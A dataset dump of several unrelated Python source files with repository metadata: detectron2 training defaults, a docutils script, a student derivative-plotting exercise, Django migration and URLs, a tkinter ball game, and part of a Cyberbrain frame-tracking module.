(machine0)$ {sys.argv[0]} --machine-rank 0 --num-machines 2 --dist-url <URL> [--other-flags]
(machine1)$ {sys.argv[0]} --machine-rank 1 --num-machines 2 --dist-url <URL> [--other-flags]
""",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--config-file", default="", metavar="FILE", help="path to config file")
parser.add_argument(
"--resume",
action="store_true",
help="Whether to attempt to resume from the checkpoint directory. "
"See documentation of `DefaultTrainer.resume_or_load()` for what it means.",
)
parser.add_argument("--eval-only", action="store_true", help="perform evaluation only")
parser.add_argument("--num-gpus", type=int, default=1, help="number of gpus *per machine*")
parser.add_argument("--num-machines", type=int, default=1, help="total number of machines")
parser.add_argument(
"--machine-rank", type=int, default=0, help="the rank of this machine (unique per machine)"
)
# PyTorch still may leave orphan processes in multi-gpu training.
# Therefore we use a deterministic way to obtain port,
# so that users are aware of orphan processes by seeing the port occupied.
port = 2 ** 15 + 2 ** 14 + hash(os.getuid() if sys.platform != "win32" else 1) % 2 ** 14
parser.add_argument(
"--dist-url",
default="tcp://127.0.0.1:{}".format(port),
help="initialization URL for pytorch distributed backend. See "
"https://pytorch.org/docs/stable/distributed.html for details.",
)
parser.add_argument(
"opts",
help="Modify config options by adding 'KEY VALUE' pairs at the end of the command. "
"See config references at "
"https://detectron2.readthedocs.io/modules/config.html#config-references",
default=None,
nargs=argparse.REMAINDER,
)
return parser
def default_setup(cfg, args):
"""
Perform some basic common setups at the beginning of a job, including:
1. Set up the detectron2 logger
2. Log basic information about environment, cmdline arguments, and config
3. Backup the config to the output directory
Args:
cfg (CfgNode): the full config to be used
args (argparse.NameSpace): the command line arguments to be logged
"""
output_dir = cfg.OUTPUT_DIR
if comm.is_main_process() and output_dir:
PathManager.mkdirs(output_dir)
rank = comm.get_rank()
setup_logger(output_dir, distributed_rank=rank, name="fvcore")
logger = setup_logger(output_dir, distributed_rank=rank)
logger.info("Rank of current process: {}. World size: {}".format(rank, comm.get_world_size()))
logger.info("Environment info:\n" + collect_env_info())
logger.info("Command line arguments: " + str(args))
if hasattr(args, "config_file") and args.config_file != "":
logger.info(
"Contents of args.config_file={}:\n{}".format(
args.config_file, PathManager.open(args.config_file, "r").read()
)
)
logger.info("Running with full config:\n{}".format(cfg))
if comm.is_main_process() and output_dir:
# Note: some of our scripts may expect the existence of
# config.yaml in output directory
path = os.path.join(output_dir, "config.yaml")
with PathManager.open(path, "w") as f:
f.write(cfg.dump())
logger.info("Full config saved to {}".format(path))
# make sure each worker has a different, yet deterministic seed if specified
seed_all_rng(None if cfg.SEED < 0 else cfg.SEED + rank)
# cudnn benchmark has large overhead. It shouldn't be used considering the small size of
# typical validation set.
if not (hasattr(args, "eval_only") and args.eval_only):
torch.backends.cudnn.benchmark = cfg.CUDNN_BENCHMARK
def default_writers(output_dir: str, max_iter: Optional[int] = None):
"""
Build a list of :class:`EventWriter` to be used.
It now consists of a :class:`CommonMetricPrinter`,
:class:`TensorboardXWriter` and :class:`JSONWriter`.
Args:
output_dir: directory to store JSON metrics and tensorboard events
max_iter: the total number of iterations
Returns:
list[EventWriter]: a list of :class:`EventWriter` objects.
"""
return [
# It may not always print what you want to see, since it prints "common" metrics only.
CommonMetricPrinter(max_iter),
JSONWriter(os.path.join(output_dir, "metrics.json")),
TensorboardXWriter(output_dir),
]
class DefaultPredictor:
"""
Create a simple end-to-end predictor with the given config that runs on
single device for a single input image.
Compared to using the model directly, this class does the following additions:
1. Load checkpoint from `cfg.MODEL.WEIGHTS`.
2. Always take BGR image as the input and apply conversion defined by `cfg.INPUT.FORMAT`.
3. Apply resizing defined by `cfg.INPUT.{MIN,MAX}_SIZE_TEST`.
4. Take one input image and produce a single output, instead of a batch.
If you'd like to do anything more fancy, please refer to its source code
as examples to build and use the model manually.
Attributes:
metadata (Metadata): the metadata of the underlying dataset, obtained from
cfg.DATASETS.TEST.
Examples:
::
pred = DefaultPredictor(cfg)
inputs = cv2.imread("input.jpg")
outputs = pred(inputs)
"""
def __init__(self, cfg):
self.cfg = cfg.clone() # cfg can be modified by model
self.model = build_model(self.cfg)
self.model.eval()
if len(cfg.DATASETS.TEST):
self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0])
checkpointer = DetectionCheckpointer(self.model)
checkpointer.load(cfg.MODEL.WEIGHTS)
self.aug = T.ResizeShortestEdge(
[cfg.INPUT.MIN_SIZE_TEST, cfg.INPUT.MIN_SIZE_TEST], cfg.INPUT.MAX_SIZE_TEST
)
self.input_format = cfg.INPUT.FORMAT
assert self.input_format in ["RGB", "BGR"], self.input_format
def __call__(self, original_image):
"""
Args:
original_image (np.ndarray): an image of shape (H, W, C) (in BGR order).
Returns:
predictions (dict):
the output of the model for one image only.
See :doc:`/tutorials/models` for details about the format.
"""
with torch.no_grad(): # https://github.com/sphinx-doc/sphinx/issues/4258
# Apply pre-processing to image.
if self.input_format == "RGB":
# whether the model expects BGR inputs or RGB
original_image = original_image[:, :, ::-1]
height, width = original_image.shape[:2]
image = self.aug.get_transform(original_image).apply_image(original_image)
image = torch.as_tensor(image.astype("float32").transpose(2, 0, 1))
inputs = {"image": image, "height": height, "width": width}
predictions = self.model([inputs])[0]
return predictions
class DefaultTrainer(TrainerBase):
"""
A trainer with default training logic. It does the following:
1. Create a :class:`SimpleTrainer` using model, optimizer, dataloader
defined by the given config. Create a LR scheduler defined by the config.
2. Load the last checkpoint or `cfg.MODEL.WEIGHTS`, if exists, when
`resume_or_load` is called.
3. Register a few common hooks defined by the config.
It is created to simplify the **standard model training workflow** and reduce code boilerplate
for users who only need the standard training workflow, with standard features.
It means this class makes *many assumptions* about your training logic that
may easily become invalid in a new research. In fact, any assumptions beyond those made in the
:class:`SimpleTrainer` are too much for research.
The code of this class has been annotated about restrictive assumptions it makes.
When they do not work for you, you're encouraged to:
1. Overwrite methods of this class, OR:
2. Use :class:`SimpleTrainer`, which only does minimal SGD training and
nothing else. You can then add your own hooks if needed. OR:
3. Write your own training loop similar to `tools/plain_train_net.py`.
See the :doc:`/tutorials/training` tutorials for more details.
Note that the behavior of this class, like other functions/classes in
this file, is not stable, since it is meant to represent the "common default behavior".
It is only guaranteed to work well with the standard models and training workflow in detectron2.
To obtain more stable behavior, write your own training logic with other public APIs.
Examples:
::
trainer = DefaultTrainer(cfg)
trainer.resume_or_load() # load last checkpoint or MODEL.WEIGHTS
trainer.train()
Attributes:
scheduler:
checkpointer (DetectionCheckpointer):
cfg (CfgNode):
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode):
"""
super().__init__()
logger = logging.getLogger("detectron2")
if not logger.isEnabledFor(logging.INFO): # setup_logger is not called for d2
setup_logger()
cfg = DefaultTrainer.auto_scale_workers(cfg, comm.get_world_size())
# Assume these objects must be constructed in this order.
model = self.build_model(cfg)
optimizer = self.build_optimizer(cfg, model)
data_loader = self.build_train_loader(cfg)
# For training, wrap with DDP. But don't need this for inference.
if comm.get_world_size() > 1:
model = DistributedDataParallel(
model, device_ids=[comm.get_local_rank()], broadcast_buffers=False
)
self._trainer = (AMPTrainer if cfg.SOLVER.AMP.ENABLED else SimpleTrainer)(
model, data_loader, optimizer
)
self.scheduler = self.build_lr_scheduler(cfg, optimizer)
# Assume no other objects need to be checkpointed.
# We can later make it checkpoint the stateful hooks
self.checkpointer = DetectionCheckpointer(
# Assume you want to save checkpoints together with logs/statistics
model,
cfg.OUTPUT_DIR,
optimizer=optimizer,
scheduler=self.scheduler,
)
self.start_iter = 0
self.max_iter = cfg.SOLVER.MAX_ITER
self.cfg = cfg
self.register_hooks(self.build_hooks())
def resume_or_load(self, resume=True):
"""
If `resume==True` and `cfg.OUTPUT_DIR` contains the last checkpoint (defined by
a `last_checkpoint` file), resume from the file. Resuming means loading all
available states (eg. optimizer and scheduler) and update iteration counter
from the checkpoint. ``cfg.MODEL.WEIGHTS`` will not be used.
Otherwise, this is considered as an independent training. The method will load model
weights from the file `cfg.MODEL.WEIGHTS` (but will not load other states) and start
from iteration 0.
Args:
resume (bool): whether to do resume or not
"""
checkpoint = self.checkpointer.resume_or_load(self.cfg.MODEL.WEIGHTS, resume=resume)
if resume and self.checkpointer.has_checkpoint():
self.start_iter = checkpoint.get("iteration", -1) + 1
# The checkpoint stores the training iteration that just finished, thus we start
# at the next iteration (or iter zero if there's no checkpoint).
if isinstance(self.model, DistributedDataParallel):
# broadcast loaded data/model from the first rank, because other
# machines may not have access to the checkpoint file
if TORCH_VERSION >= (1, 7):
self.model._sync_params_and_buffers()
self.start_iter = comm.all_gather(self.start_iter)[0]
def build_hooks(self):
"""
Build a list of default hooks, including timing, evaluation,
checkpointing, lr scheduling, precise BN, writing events.
Returns:
list[HookBase]:
"""
cfg = self.cfg.clone()
cfg.defrost()
cfg.DATALOADER.NUM_WORKERS = 0 # save some memory and time for PreciseBN
ret = [
hooks.IterationTimer(),
hooks.LRScheduler(),
hooks.PreciseBN(
# Run at the same freq as (but before) evaluation.
cfg.TEST.EVAL_PERIOD,
self.model,
# Build a new data loader to not affect training
self.build_train_loader(cfg),
cfg.TEST.PRECISE_BN.NUM_ITER,
)
if cfg.TEST.PRECISE_BN.ENABLED and get_bn_modules(self.model)
else None,
]
# Do PreciseBN before checkpointer, because it updates the model and need to
# be saved by checkpointer.
# This is not always the best: if checkpointing has a different frequency,
# some checkpoints may have more precise statistics than others.
if comm.is_main_process():
ret.append(hooks.PeriodicCheckpointer(self.checkpointer, cfg.SOLVER.CHECKPOINT_PERIOD))
def test_and_save_results():
self._last_eval_results = self.test(self.cfg, self.model)
return self._last_eval_results
# Do evaluation after checkpointer, because then if it fails,
# we can use the saved checkpoint to debug.
ret.append(hooks.EvalHook(cfg.TEST.EVAL_PERIOD, test_and_save_results))
if comm.is_main_process():
# Here the default print/log frequency of each writer is used.
# run writers in the end, so that evaluation metrics are written
ret.append(hooks.PeriodicWriter(self.build_writers(), period=20))
return ret
def build_writers(self):
"""
Build a list of writers to be used using :func:`default_writers()`.
If you'd like a different list of writers, you can overwrite it in
your trainer.
Returns:
list[EventWriter]: a list of :class:`EventWriter` objects.
"""
return default_writers(self.cfg.OUTPUT_DIR, self.max_iter)
def train(self):
"""
Run training.
Returns:
OrderedDict of results, if evaluation is enabled. Otherwise None.
"""
super().train(self.start_iter, self.max_iter)
if len(self.cfg.TEST.EXPECTED_RESULTS) and comm.is_main_process():
assert hasattr(
self, "_last_eval_results"
), "No evaluation results obtained during training!"
verify_results(self.cfg, self._last_eval_results)
return self._last_eval_results
def run_step(self):
self._trainer.iter = self.iter
self._trainer.run_step()
@classmethod
def build_model(cls, cfg):
"""
Returns:
torch.nn.Module:
It now calls :func:`detectron2.modeling.build_model`.
Overwrite it if you'd like a different model.
"""
model = build_model(cfg)
logger = logging.getLogger(__name__)
logger.info("Model:\n{}".format(model))
return model
@classmethod
def build_optimizer(cls, cfg, model):
"""
Returns:
torch.optim.Optimizer:
It now calls :func:`detectron2.solver.build_optimizer`.
Overwrite it if you'd like a different optimizer.
"""
return build_optimizer(cfg, model)
@classmethod
def build_lr_scheduler(cls, cfg, optimizer):
"""
It now calls :func:`detectron2.solver.build_lr_scheduler`.
Overwrite it if you'd like a different scheduler.
"""
return build_lr_scheduler(cfg, optimizer)
@classmethod
def build_train_loader(cls, cfg):
"""
Returns:
iterable
It now calls :func:`detectron2.data.build_detection_train_loader`.
Overwrite it if you'd like a different data loader.
"""
return build_detection_train_loader(cfg)
@classmethod
def build_test_loader(cls, cfg, dataset_name):
"""
Returns:
iterable
It now calls :func:`detectron2.data.build_detection_test_loader`.
Overwrite it if you'd like a different data loader.
"""
return build_detection_test_loader(cfg, dataset_name)
@classmethod
def build_evaluator(cls, cfg, dataset_name):
"""
Returns:
DatasetEvaluator or None
It is not implemented by default.
"""
raise NotImplementedError(
"""
If you want DefaultTrainer to automatically run evaluation,
please implement `build_evaluator()` in subclasses (see train_net.py for example).
Alternatively, you can call evaluation functions yourself (see Colab balloon tutorial for example).
"""
)
@classmethod
def test(cls, cfg, model, evaluators=None):
"""
Args:
cfg (CfgNode):
model (nn.Module):
evaluators (list[DatasetEvaluator] or None): if None, will call
:meth:`build_evaluator`. Otherwise, must have the same length as
``cfg.DATASETS.TEST``.
Returns:
dict: a dict of result metrics
"""
logger = logging.getLogger(__name__)
if isinstance(evaluators, DatasetEvaluator):
evaluators = [evaluators]
if evaluators is not None:
assert len(cfg.DATASETS.TEST) == len(evaluators), "{} != {}".format(
len(cfg.DATASETS.TEST), len(evaluators)
)
results = OrderedDict()
for idx, dataset_name in enumerate(cfg.DATASETS.TEST):
data_loader = cls.build_test_loader(cfg, dataset_name)
# When evaluators are passed in as arguments,
# implicitly assume that evaluators can be created before data_loader.
if evaluators is not None:
evaluator = evaluators[idx]
else:
try:
evaluator = cls.build_evaluator(cfg, dataset_name)
except NotImplementedError:
logger.warn(
"No evaluator found. Use `DefaultTrainer.test(evaluators=)`, "
"or implement its `build_evaluator` method."
)
results[dataset_name] = {}
continue
results_i = inference_on_dataset(model, data_loader, evaluator)
results[dataset_name] = results_i
if comm.is_main_process():
assert isinstance(
results_i, dict
), "Evaluator must return a dict on the main process. Got {} instead.".format(
results_i
)
logger.info("Evaluation results for {} in csv format:".format(dataset_name))
print_csv_format(results_i)
if len(results) == 1:
results = list(results.values())[0]
return results
@staticmethod
def auto_scale_workers(cfg, num_workers: int):
"""
When the config is defined for certain number of workers (according to
``cfg.SOLVER.REFERENCE_WORLD_SIZE``) that's different from the number of
workers currently in use, returns a new cfg where the total batch size
is scaled so that the per-GPU batch size stays the same as the
original ``IMS_PER_BATCH // REFERENCE_WORLD_SIZE``.
Other config options are also scaled accordingly:
* training steps and warmup steps are scaled inverse proportionally.
* learning rate are scaled proportionally, following :paper:`ImageNet in 1h`.
For example, with the original config like the following:
.. code-block:: yaml
IMS_PER_BATCH: 16
BASE_LR: 0.1
REFERENCE_WORLD_SIZE: 8
MAX_ITER: 5000
STEPS: (4000,)
CHECKPOINT_PERIOD: 1000
When this config is used on 16 GPUs instead of the reference number 8,
calling this method will return a new config with:
.. code-block:: yaml
IMS_PER_BATCH: 32
BASE_LR: 0.2
REFERENCE_WORLD_SIZE: 16
MAX_ITER: 2500
STEPS: (2000,)
CHECKPOINT_PERIOD: 500
Note that both the original config and this new config can be trained on 16 GPUs.
It's up to user whether to enable this feature (by setting ``REFERENCE_WORLD_SIZE``).
Returns:
CfgNode: a new config. Same as original if ``cfg.SOLVER.REFERENCE_WORLD_SIZE==0``.
"""
old_world_size = cfg.SOLVER.REFERENCE_WORLD_SIZE
if old_world_size == 0 or old_world_size == num_workers:
return cfg
cfg = cfg.clone()
frozen = cfg.is_frozen()
cfg.defrost()
assert (
cfg.SOLVER.IMS_PER_BATCH % old_world_size == 0
), "Invalid REFERENCE_WORLD_SIZE in config!"
scale = num_workers / old_world_size
bs = cfg.SOLVER.IMS_PER_BATCH = int(round(cfg.SOLVER.IMS_PER_BATCH * scale))
lr = cfg.SOLVER.BASE_LR = cfg.SOLVER.BASE_LR * scale
max_iter = cfg.SOLVER.MAX_ITER = int(round(cfg.SOLVER.MAX_ITER / scale))
warmup_iter = cfg.SOLVER.WARMUP_ITERS = int(round(cfg.SOLVER.WARMUP_ITERS / scale))
cfg.SOLVER.STEPS = tuple(int(round(s / scale)) for s in cfg.SOLVER.STEPS)
cfg.TEST.EVAL_PERIOD = int(round(cfg.TEST.EVAL_PERIOD / scale))
cfg.SOLVER.CHECKPOINT_PERIOD = int(round(cfg.SOLVER.CHECKPOINT_PERIOD / scale))
cfg.SOLVER.REFERENCE_WORLD_SIZE = num_workers # maintain invariant
logger = logging.getLogger(__name__)
logger.info(
f"Auto-scaling the config to batch_size={bs}, learning_rate={lr}, "
f"max_iter={max_iter}, warmup={warmup_iter}."
)
if frozen:
cfg.freeze()
return cfg
# Access basic attributes from the underlying trainer
for _attr in ["model", "data_loader", "optimizer"]:
setattr(
DefaultTrainer,
_attr,
property(
# getter
lambda self, x=_attr: getattr(self._trainer, x),
# setter
lambda self, value, x=_attr: setattr(self._trainer, x, value),
),
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
7bf3cd6349e900045b70d5067d841f9c263f9e28 | 318013ccb8738ace0ec72965dac0a3e3fe2fecad | /venv/bin/rst2man.py | 349d495c52f4ce4e924826a8e3e02475f3a96e78 | [] | no_license | nahyunkwon/Processing-3DImages | 792deafbd1a607af8cae439b5d7ab81f772f6653 | bde217aad08dd911ae8125edeae42f7b674614f2 | refs/heads/master | 2023-01-02T10:29:41.325974 | 2020-11-01T19:02:19 | 2020-11-01T19:02:19 | 299,133,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/Users/kwon/PycharmProjects/3D_A2I/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
| [
"skgus2624@gmail.com"
] | skgus2624@gmail.com |
ab48adc1e062d9080c5cb2145e3c5b78a51ebdd6 | f6078890ba792d5734d289d7a0b1d429d945a03a | /mid-term/chapmanbrendan/chapmanbrendan_26691_1312276_Q3.py | 299fe01f6c53025391c5faf4bf7e5800e3c4c29f | [] | no_license | huazhige/EART119_Lab | 1c3d0b986a0f59727ee4ce11ded1bc7a87f5b7c0 | 47931d6f6a2c7bc053cd15cef662eb2f2027712c | refs/heads/master | 2020-05-04T23:40:53.709217 | 2019-06-11T18:30:45 | 2019-06-11T18:30:45 | 179,552,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,818 | py | # -*- coding: utf-8 -*-
"""
Created on Wed May 8 08:24:43 2019
@author: blchapma
"""
#============================================================================
"Packages"
#============================================================================
import numpy as np
import matplotlib.pyplot as plt
#============================================================================
"Variables"
#============================================================================
mData = np.loadtxt('E:\EAR119\Python Scripts\midterm_dydx.txt').T
a_t, a_y = mData[0], mData[1]
#===================================================================================
# derivatives
#===================================================================================
N = len( a_t)
dt = a_t[1]-a_t[0]
a_vel = (a_y[2::] - a_y[0:-2])/(2*dt)
a_acc = (a_y[2::] - 2*a_y[1:-1] + a_y[0:-2])/(dt**2)
# add zeros at beginning and end for plotting purposes
a_vel = np.hstack( (0,a_vel, 0))
a_acc = np.hstack( (0,a_acc, 0))
for i in range( 1, N-1):
a_vel[i] = ( a_y[i+1] - a_y[i-1])/(2*dt)
a_acc[i] = ( a_y[i+1] - 2*a_y[i] + a_y[i-1])/(dt**2)
else: # vectorized solution
y = 0
# From Week 2:
i = 1
while y[i] > y[i-1]:
largest_height = y[i]
i += 1
#===================================================================================
# plots
#===================================================================================
t_maxHeight = a_t[i]
print "The largest height achieved was %f m" % (largest_height), ' at t =', t_maxHeight
# We might also like to plot the path again just to compare
plt.figure()
plt.subplot( 311)
plt.plot( a_t, a_y)
plt.plot( [t_maxHeight], a_y[a_t == t_maxHeight], 'r*')
plt.ylabel('Height (m)')
plt.grid( True)
plt.subplot( 312)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_vel[1:-1])
# peak height at v = 0
plt.plot( [t_maxHeight], a_vel[a_t == t_maxHeight], 'r*')
plt.ylabel('Velocity (m/s)')
plt.grid( True)
plt.subplot( 313)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_acc[1:-1])
plt.xlabel('Time (s)')
plt.ylabel('Acceleration (m/s2)')
plt.ylim( -g - 5, -g+5)
plt.grid( True)
plt.show()
#============================================================================
"Image"
#============================================================================
plt.savefig("Q1", dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format="PNG",
transparent=False, bbox_inches=None, pad_inches=0.1,
frameon=None, metadata=None)
plt.show()
#============================================================================ | [
"hge2@ucsc.edu"
] | hge2@ucsc.edu |
1b84faef65cc22245c96450dcbadae2ec6e81808 | 05725c7af76fd87d94cf424ef7d66efa50ac0bae | /mysite/exam/migrations/0008_auto_20200529_0948.py | 0d2407fdaef56b2c25e7ab300a64fb37490869b2 | [] | no_license | zhuzemin/questionnaire | 759ff2a9f14062f4cc03782269e8c17222a5b778 | 473a17bb0eb6fadeef0884df61d456d8bbb43259 | refs/heads/master | 2022-11-07T08:32:42.741511 | 2020-07-01T07:04:24 | 2020-07-01T07:04:24 | 276,302,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | # Generated by Django 3.0.6 on 2020-05-29 01:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('exam', '0007_exam_status'),
]
operations = [
migrations.AddField(
model_name='exam',
name='finishTime',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='exam',
name='startTime',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='exam',
name='logtime',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
| [
"gogs@fake.local"
] | gogs@fake.local |
ac5ba21305a500a9b7671ef57166bd48d55276cc | 93e5b82332af9f0d3e203d086e30794fb90a2086 | /ForKids/appendixb/ch14-game-over.py | 474538652bae3b7192201c20d918b5c516da7d26 | [] | no_license | swell1009/ex | cfaae0b5fe917f12416170dce60f7dea8194f368 | 29b274fb51adbdc43af6ebecaec89c97bc58be6f | refs/heads/master | 2020-04-04T10:15:20.578932 | 2018-11-22T06:27:30 | 2018-11-22T06:27:30 | 155,848,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,701 | py | from tkinter import *
import random
import time
class Ball:
def __init__(self, canvas, paddle, color):
self.canvas = canvas
self.paddle = paddle
self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
self.canvas.move(self.id, 245, 100)
starts = [-3, -2, -1, 1, 2, 3]
random.shuffle(starts)
self.x = starts[0]
self.y = -3
self.canvas_width = self.canvas.winfo_width()
self.canvas_height = self.canvas.winfo_height()
self.hit_bottom = False
def hit_paddle(self, pos):
paddle_pos = self.canvas.coords(self.paddle.id)
if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:
if pos[3] >= paddle_pos[1] and pos[3] <= paddle_pos[3]:
return True
return False
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 3
if self.hit_paddle(pos) == True:
self.y = -3
if pos[3] >= self.canvas_height:
self.hit_bottom = True
if pos[0] <= 0:
self.x = 3
if pos[2] >= self.canvas_width:
self.x = -3
class Paddle:
def __init__(self, canvas, color):
self.canvas = canvas
self.id = canvas.create_rectangle(0, 0, 100, 10, fill=color)
self.canvas.move(self.id, 200, 300)
self.x = 0
self.canvas_width = self.canvas.winfo_width()
self.started = False
self.canvas.bind_all('<KeyPress-Left>', self.turn_left)
self.canvas.bind_all('<KeyPress-Right>', self.turn_right)
self.canvas.bind_all('<Button-1>', self.start_game)
def draw(self):
self.canvas.move(self.id, self.x, 0)
pos = self.canvas.coords(self.id)
if pos[0] <= 0:
self.x = 0
elif pos[2] >= self.canvas_width:
self.x = 0
def turn_left(self, evt):
self.x = -2
def turn_right(self, evt):
self.x = 2
def start_game(self, evt):
self.started = True
tk = Tk()
tk.title("Game")
tk.resizable(0, 0)
tk.wm_attributes("-topmost", 1)
canvas = Canvas(tk, width=500, height=400, bd=0, highlightthickness=0)
canvas.pack()
tk.update()
paddle = Paddle(canvas, 'blue')
ball = Ball(canvas, paddle, 'red')
game_over_text = canvas.create_text(250, 200, text='GAME OVER', state='hidden')
while 1:
if ball.hit_bottom == False and paddle.started == True:
ball.draw()
paddle.draw()
if ball.hit_bottom == True:
time.sleep(1)
canvas.itemconfig(game_over_text, state='normal')
tk.update_idletasks()
tk.update()
time.sleep(0.01)
| [
"swell1009@qq.com"
] | swell1009@qq.com |
b69fc07f785607209aa5e7a0bc332aad97fe3e9f | 6b9888a32733bc9d67f290cd006fb4dca84bcaf1 | /experience/templatetags/__init__.py | a6baf38fdb4d35cc22ccbc86072c811995c6c2f1 | [] | no_license | Shatki/TanyaSite2.7 | a2008257a63134411139594c54473e88f21df8c0 | 69c7d6516d3d28dbe9370d94aacce0ac04070822 | refs/heads/master | 2020-04-30T02:31:10.274659 | 2019-03-27T19:41:59 | 2019-03-27T19:41:59 | 176,562,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | from .filters import delays
| [
"Shatki@mail.ru"
] | Shatki@mail.ru |
230c7858868fd3f749ca0b020713498141986b25 | 9043da349ef0dde4cb6d819a69992274cac99125 | /app/views.py | 18d64f925ce07f531d717d8d30d40975dc5db33a | [] | no_license | zcoder/cantailme-server | e78529f5fa554ff2979215f21089068629aa1259 | 3940c4177ecca43aa78040b129aa29327a466c29 | refs/heads/master | 2021-01-16T21:07:35.372771 | 2012-07-10T18:17:40 | 2012-07-10T18:17:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | from django.shortcuts import get_object_or_404
from annoying.decorators import render_to
from app.models import TailSession
@render_to('app/index.html')
def index(request):
"""Index page"""
return {}
@render_to('app/tail.html')
def tail(request, hash):
"""Display by hash"""
return {
'session': get_object_or_404(TailSession, hash=hash),
}
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
fb683de87b440fb79e7283fcdf4f67d2062f4338 | c4f0a0215956ff0c29ae491a10416a72c1ce654d | /nails_project/nails_project/accounts/urls.py | d27edda41f2e3ed2b138980e290a802ebb7219da | [] | no_license | borislavstoychev/my_exam | 1a2a499b2e6ac507641a9aad76576d49d4ac6a6d | 9c756f76679ad85697ff123c478b765656d4ce2d | refs/heads/main | 2023-07-13T12:49:40.116891 | 2021-08-25T08:54:44 | 2021-08-25T08:54:44 | 380,476,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | from django.urls import path
from nails_project.accounts import views
urlpatterns = (
path('sign-in/', views.SignInView.as_view(), name='sign in user'),
path('sign-out/', views.SignOutView.as_view(), name='sign out user'),
path('sign-up/', views.SignUpView.as_view(), name='sign up user'),
path('profile/<int:pk>/', views.ProfileUpdateView.as_view(), name='profile details'),
path('delete/<int:pk>/', views.ProfileDeleteView.as_view(), name='profile delete'),
path('activate/<uidb64>/<token>/', views.activate, name='activate'),
)
| [
"stoy4ew@gmail.com"
] | stoy4ew@gmail.com |
408b2759512d27d6ac6c858cf465b57ebc6a92ae | b67bcff47ed23af86edc27ea8bf8c4b24fd67434 | /cyberbrain/basis.py | 2c5bd59854b426b16202b843f6886116a431ef98 | [
"MIT"
] | permissive | vvoody/Cyberbrain | 3f0f0f671f18377566f32f5f5381ac9ab4a61bb9 | bac343b6e596d270d152e345ee74c2d0b8d265a2 | refs/heads/master | 2020-08-24T02:36:31.111072 | 2019-10-21T07:04:43 | 2019-10-21T07:04:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | """Some basic data structures used throughout the project."""
from collections import defaultdict
from enum import Enum
from typing import Dict, NamedTuple, Tuple, Union
# "surrounding" is a 2-element tuple (start_lineno, end_lineno), representing a
# logical line. Line number is frame-wise.
#
# For single-line statement, start_lineno = end_lineno, and is the line number of the
# physical line returned by get_lineno_from_lnotab.
#
# For multiline statement, start_lineno is the line number of the first physical line,
# end_lineno is the last. Lines from start_lineno to end_lineno -1 should end with
# token.NL(or tokenize.NL before 3.7), line end_lineno should end with token.NEWLINE.
#
# Example:
# 0 a = true
# 1 a = true
# 2 b = {
# 3 'foo': 'bar'
# 4 }
# 5 c = false
#
# For the assignment of b, start_lineno = 2, end_lineno = 4
Surrounding = NamedTuple("Surrounding", [("start_lineno", int), ("end_lineno", int)])
SourceLocation = NamedTuple("SourceLocation", [("filepath", str), ("lineno", int)])
_dummy = object()
class NodeType(Enum):
"""Just node types."""
LINE = 1
CALL = 2
class FrameID:
"""Class that represents a frame.
Basically, a frame id is just a tuple, where each element represents the frame index
within the same parent frame. For example, consider this snippet:
def f(): g()
def g(): pass
f()
f()
Assuming the frame id for global frame is (0,). We called f two times with two
frames (0, 0) and (0, 1). f calls g, which also generates two frames (0, 0, 0) and
(0, 1, 0). By comparing prefixes, it's easy to know whether one frame is the parent
frame of the other.
We also maintain the frame id of current code location. New frame ids are generated
based on event type and current frame id.
TODO: record function name.
"""
current_ = (0,)
# Mapping from parent frame id to max child frame index.
child_index: Dict[Tuple, int] = defaultdict(int)
def __init__(self, frame_id_tuple: Tuple[int, ...], co_name: str = ""):
self._frame_id_tuple = frame_id_tuple
self.co_name = co_name
def __eq__(self, other: Union["FrameID", Tuple[int, ...]]):
if isinstance(other, FrameID):
return self._frame_id_tuple == other._frame_id_tuple
return isinstance(other, Tuple) and self._frame_id_tuple == other
def __hash__(self):
return hash(self._frame_id_tuple)
def __add__(self, other: Tuple):
return FrameID(self._frame_id_tuple + other)
@property
def tuple(self):
return self._frame_id_tuple
@classmethod
def current(cls):
return FrameID(cls.current_)
@property
def parent(self):
return FrameID(self._frame_id_tuple[:-1])
def is_child_of(self, other):
return other == self._frame_id_tuple
def is_parent_of(self, other):
return self == other._frame_id_tuple
@classmethod
def create(cls, event: str):
assert event in {"line", "call", "return"}
if event == "line":
return cls.current()
if event == "call":
frame_id = cls.current()
cls.current_ = cls.current_ + (cls.child_index[cls.current_],)
return frame_id # callsite is in caller frame.
if event == "return":
call_frame = cls.current()
cls.current_ = cls.current_[:-1]
# After exiting call frame, increments call frame's child index.
cls.child_index[cls.current_] += 1
return call_frame
def __str__(self):
"""Prints the tuple representation."""
return f"{str(self._frame_id_tuple)} {self.co_name}"
class ID(str):
"""A class that represents an identifier.
There's no need to save frame info, because at a ceratain time, a computation or
